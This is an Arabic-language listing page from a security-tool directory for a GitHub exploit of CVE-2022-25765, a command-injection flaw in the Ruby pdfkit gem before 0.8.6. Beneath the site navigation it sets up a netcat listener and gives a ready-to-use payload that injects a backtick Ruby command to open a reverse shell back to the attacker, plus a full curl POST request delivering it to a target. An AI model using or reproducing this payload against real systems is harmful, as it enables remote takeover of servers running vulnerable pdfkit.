Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-25765-pdfkit-Exploit-Reverse-Shell — pdfkit <0.8.6 صدفة حقن الأوامر. الحزمة pdfkit من الإصدار 0.0.0 عرضة لحقن الأوامر حيث لا يتم تنقية عنوان URL بشكل صحيح. (تم الاختبار على الإصدار 0.8.6) - CVE-2022-25765 | Kitploit
أدوات/GitHubGitHub/purplewaveio/cve-2022-25765-pdfkit-exploit-reverse-shell
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubpurplewaveio/cve-2022-25765-pdfkit-exploit-reverse-shell

CVE-2022-25765-pdfkit-Exploit-Reverse-Shell

pdfkit <0.8.6 صدفة حقن الأوامر. الحزمة pdfkit من الإصدار 0.0.0 عرضة لحقن الأوامر حيث لا يتم تنقية عنوان URL بشكل صحيح. (تم الاختبار على الإصدار 0.8.6) - CVE-2022-25765

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2011منذ 3 سنواتتمت المراجعة من قبل Kitploit

CVE-2022-25765-pdfkit-Exploit-Reverse-Shell

pdfkit <0.8.6 شل حقن أوامر. الحزمة pdfkit من الإصدار 0.0.0 عرضة لحقن الأوامر حيث لم يتم تنظيف عنوان URL بشكل صحيح. (تم اختباره على الإصدار 0.8.6) - CVE-2022-25765

المتطلبات الأساسية:

  1. إعداد خادم HTTP - python3 -m http.server
  2. إعداد مستمع Netcat - nc -lvnp 4444

شل Ruby عكسي عبر صفحة ويب: http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",LOCAL-LISTEN-PORT))')

عبر CURL (قم بتعديل القيم بالخط العريض): curl 'TARGET-URL' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: TARGET_URL' -H 'Connection: keep-alive' -H 'Referer: TARGET_URL' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2FLOCAL-IP%3ALOCAL-HTTP-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-IP%22%2CLOCAL-LISTEN-PORT%29%29%27%60'

تنزيل الأداة